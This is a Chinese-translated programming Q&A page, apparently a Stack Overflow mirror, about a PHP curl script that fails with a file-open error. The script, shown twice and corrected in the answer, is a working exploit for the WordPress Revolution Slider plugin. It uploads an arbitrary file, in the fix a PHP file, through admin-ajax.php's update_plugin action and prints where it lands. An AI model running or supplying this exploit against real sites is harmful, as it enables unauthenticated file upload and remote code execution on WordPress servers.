Curl_init没有工作字符串'无法打开文件""' (长度= 21)

时间:2015-09-01 07:08:10

标签: php wordpress php-curl

我试图测试wordpress网站上的漏洞并使用curl对其进行测试。

然而,似乎卷曲不起作用。

    <?php

 // $uploaded file 
$myf = "test.txt";

function meroAttack($site, $myf) {
    $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
    $cookie_file_path = "/";
    $site   = rtrim($site,'/');
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
    if($result === FALSE){
        var_dump(curl_error($ch));
    }

    if (eregi('Update in progress', $result)) {
        echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
    } else {
        echo $site . " : Not Revslider \n\n";
    }
    curl_close($ch);
}

    meroAttack("http://test.wordpress.devlocal/", $myf);

?>

除了它在我的页面上显示如下错误:

  

字符串&#39;无法打开文件&#34;&#34;&#39; (长度= 21)

是否有遗漏的东西

1 个答案:

答案 0 :(得分:1)

纠正了这个问题。

问题是真实路径不正确:

$myf = "/wamp/www/laravel/laravel/public/test2.php";

最终代码:

<?php
 ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(-1);
// $uploaded file 
$myf = "/wamp/www/laravel/laravel/public/test2.php";

function meroAttack($site, $myf) {

    $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
    $cookie_file_path = "/";
    $site   = rtrim($site,'/');
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site . "/wp-admin/admin-ajax.php");
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Length: 1024','Expect:'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, array("update_file" => "@" . realpath($myf), "action" => "revslider_ajax_action", "client_action" => "update_plugin"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $result = curl_exec($ch);
    if($result === FALSE){
        var_dump(curl_error($ch));
        var_dump(curl_errno($ch));
    }

    if (eregi('Update in progress', $result)) {
        echo $site . "/wp-content/plugins/revslider/temp/update_extract/" . $myf;
    } else {
        echo $site . " : Not Revslider \n\n";
    }
    curl_close($ch);
}

meroAttack("http://test.wordpress.devlocal/", $myf);